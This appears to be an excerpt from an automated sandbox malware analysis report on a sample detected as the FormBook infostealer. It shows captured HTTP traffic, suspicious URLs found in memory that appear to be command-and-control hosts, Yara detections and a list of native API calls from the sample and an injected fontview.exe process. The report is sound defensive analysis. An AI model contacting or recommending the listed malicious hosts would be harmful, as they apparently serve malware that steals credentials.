62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sat, 11 Jan 2025 04:05:31 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sat, 11 Jan 2025 04:05:33 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 04:05:38 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p mod_fcgid/2.3.9aContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 04:05:41 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p mod_fcgid/2.3.9aContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 04:05:43 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p mod_fcgid/2.3.9aContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 04:05:46 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p mod_fcgid/2.3.9aContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Source: fontview.exe, 0000000C.00000002.3128854524.0000000004DA4000.00000004.10000000.00040000.00000000.sdmp, mErdTxurOiTQQ.exe, 0000000D.00000002.3127429206.0000000003404000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.1959256452.000000000A454000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://comect.online/cs7c/?FT=CdryMvIuRPhrhNp
Source: ydJaT4b5N8.exe, 00000000.00000002.1424852227.00000000026A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://localhost/arkanoid_server/requests.php
Source: mErdTxurOiTQQ.exe, 0000000D.00000002.3129343241.00000000054B5000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.vilakodsiy.sbs
Source: mErdTxurOiTQQ.exe, 0000000D.00000002.3129343241.00000000054B5000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.vilakodsiy.sbs/vq3j/
Source: fontview.exe, 0000000C.00000003.1852822596.00000000076A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: fontview.exe, 0000000C.00000003.1852822596.00000000076A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: fontview.exe, 0000000C.00000003.1852822596.00000000076A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: fontview.exe, 0000000C.00000003.1852822596.00000000076A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: fontview.exe, 0000000C.00000003.1852822596.00000000076A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: fontview.exe, 0000000C.00000003.1852822596.00000000076A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: fontview.exe, 0000000C.00000003.1852822596.00000000076A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: fontview.exe, 0000000C.00000002.3123858472.000000000045A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=ser
Source: fontview.exe, 0000000C.00000002.3123858472.000000000045A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: fontview.exe, 0000000C.00000002.3123858472.000000000045A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: fontview.exe, 0000000C.00000002.3123858472.000000000045A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2LMEM
Source: fontview.exe, 0000000C.00000002.3123858472.000000000045A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: fontview.exe, 0000000C.00000002.3123858472.000000000045A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
Source: fontview.exe, 0000000C.00000002.3123858472.000000000045A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033a
Source: fontview.exe, 0000000C.00000002.3123858472.000000000045A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: fontview.exe, 0000000C.00000002.3123858472.000000000045A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: fontview.exe, 0000000C.00000003.1846401297.0000000007682000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: fontview.exe, 0000000C.00000003.1852822596.00000000076A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: fontview.exe, 0000000C.00000003.1852822596.00000000076A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 10.2.ydJaT4b5N8.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.ydJaT4b5N8.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.3127827624.0000000004150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1660637052.0000000001260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3123177691.0000000000170000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3127701911.0000000004100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3129343241.0000000005450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1659559960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1662457290.00000000016C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3126887129.0000000002570000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0042C813 NtClose,	10_2_0042C813
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E2B60 NtClose,LdrInitializeThunk,	10_2_013E2B60
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E2DF0 NtQuerySystemInformation,LdrInitializeThunk,	10_2_013E2DF0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E2C70 NtFreeVirtualMemory,LdrInitializeThunk,	10_2_013E2C70
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E35C0 NtCreateMutant,LdrInitializeThunk,	10_2_013E35C0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E4340 NtSetContextThread,	10_2_013E4340
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E4650 NtSuspendThread,	10_2_013E4650
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E2BA0 NtEnumerateValueKey,	10_2_013E2BA0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E2B80 NtQueryInformationFile,	10_2_013E2B80
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E2BF0 NtAllocateVirtualMemory,	10_2_013E2BF0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E2BE0 NtQueryValueKey,	10_2_013E2BE0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E2AB0 NtWaitForSingleObject,	10_2_013E2AB0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E2AF0 NtWriteFile,	10_2_013E2AF0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E2AD0 NtReadFile,	10_2_013E2AD0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E2D30 NtUnmapViewOfSection,	10_2_013E2D30
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E2D10 NtMapViewOfSection,	10_2_013E2D10
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E2D00 NtSetInformationFile,	10_2_013E2D00
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E2DB0 NtEnumerateKey,	10_2_013E2DB0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E2DD0 NtDelayExecution,	10_2_013E2DD0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E2C00 NtQueryInformationProcess,	10_2_013E2C00
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E2C60 NtCreateKey,	10_2_013E2C60
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E2CA0 NtQueryInformationToken,	10_2_013E2CA0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E2CF0 NtOpenProcess,	10_2_013E2CF0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E2CC0 NtQueryVirtualMemory,	10_2_013E2CC0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E2F30 NtCreateSection,	10_2_013E2F30
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E2F60 NtCreateProcessEx,	10_2_013E2F60
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E2FB0 NtResumeThread,	10_2_013E2FB0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E2FA0 NtQuerySection,	10_2_013E2FA0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E2F90 NtProtectVirtualMemory,	10_2_013E2F90
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E2FE0 NtCreateFile,	10_2_013E2FE0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E2E30 NtWriteVirtualMemory,	10_2_013E2E30
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E2EA0 NtAdjustPrivilegesToken,	10_2_013E2EA0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E2E80 NtReadVirtualMemory,	10_2_013E2E80
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E2EE0 NtQueueApcThread,	10_2_013E2EE0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E3010 NtOpenDirectoryObject,	10_2_013E3010
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E3090 NtSetValueKey,	10_2_013E3090
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E39B0 NtGetContextThread,	10_2_013E39B0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E3D10 NtOpenProcessToken,	10_2_013E3D10
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E3D70 NtOpenThread,	10_2_013E3D70
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04404650 NtSuspendThread,LdrInitializeThunk,	12_2_04404650
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04404340 NtSetContextThread,LdrInitializeThunk,	12_2_04404340
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04402C60 NtCreateKey,LdrInitializeThunk,	12_2_04402C60
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04402C70 NtFreeVirtualMemory,LdrInitializeThunk,	12_2_04402C70
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04402CA0 NtQueryInformationToken,LdrInitializeThunk,	12_2_04402CA0
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04402D10 NtMapViewOfSection,LdrInitializeThunk,	12_2_04402D10
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04402D30 NtUnmapViewOfSection,LdrInitializeThunk,	12_2_04402D30
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04402DD0 NtDelayExecution,LdrInitializeThunk,	12_2_04402DD0
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04402DF0 NtQuerySystemInformation,LdrInitializeThunk,	12_2_04402DF0
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04402EE0 NtQueueApcThread,LdrInitializeThunk,	12_2_04402EE0
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04402E80 NtReadVirtualMemory,LdrInitializeThunk,	12_2_04402E80
